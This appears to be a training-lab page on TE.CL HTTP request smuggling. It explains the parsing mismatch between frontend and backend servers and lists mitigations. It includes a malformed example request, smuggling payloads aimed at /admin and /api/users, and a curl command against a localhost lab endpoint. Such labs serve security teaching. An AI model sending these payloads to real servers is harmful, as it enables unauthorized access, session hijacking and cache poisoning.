Lab 2: TE.CL Smuggling - HTTP Request Smuggling

Difficulty: Medium

Lab Overview

This lab demonstrates a TE.CL (Transfer-Encoding vs Content-Length) HTTP Request Smuggling vulnerability. The frontend server uses Transfer-Encoding: chunked to determine the request body length, while the backend server uses Content-Length.

Objective: Send a malformed HTTP request that exploits the parsing difference to smuggle additional requests past security controls.

Vulnerable Request Processing

// Vulnerable: Different parsing between frontend and backend
// Frontend uses Transfer-Encoding: chunked
// Backend uses Content-Length

// Example vulnerable request:
POST /2.php HTTP/1.1
Host: example.com
Transfer-Encoding: chunked
Content-Length: 3

0

SMUGGLED

// Frontend sees: Transfer-Encoding: chunked (reads until 0\r\n)
// Backend sees: Content-Length: 3 (reads 3 bytes)
// Result: "SMUGGLED" becomes the start of the next request

Request Smuggling Tester

Test Payloads:

0\r\n\r\nSMUGGLED - Basic TE.CL payload
0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n - Admin access
0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin - API access

Vulnerability Details

Type: HTTP Request Smuggling (TE.CL)
Severity: High
Method: POST
Issue: Different parsing between frontend and backend

Test Payloads

Try these payloads in the request body:

0\r\n\r\nSMUGGLED
0\r\n\r\nGET /admin HTTP/1.1\r\nHost: example.com\r\n\r\n
0\r\n\r\nPOST /api/users HTTP/1.1\r\nHost: example.com\r\nContent-Length: 10\r\n\r\nuser=admin

Manual Testing with curl

Use these curl commands to test the vulnerability:

curl -X POST http://localhost/test/http_rs/2.php \
  -H "Transfer-Encoding: chunked" \
  -H "Content-Length: 3" \
  -d "0

SMUGGLED"

Real-World Attack Scenarios

Bypass security controls and access unauthorized resources
Access internal APIs and sensitive endpoints
Bypass authentication and authorization mechanisms
Session hijacking and user impersonation
Cache poisoning and serving malicious content
Compliance violations and security breaches

Mitigation Strategies

Ensure consistent parsing between frontend and backend servers
Disable Transfer-Encoding support if not needed
Use HTTP/2 to avoid parsing differences
Implement request validation and sanitization
Use reverse proxies that handle parsing consistently
Regular security testing and vulnerability assessments
Monitor for unusual request patterns and anomalies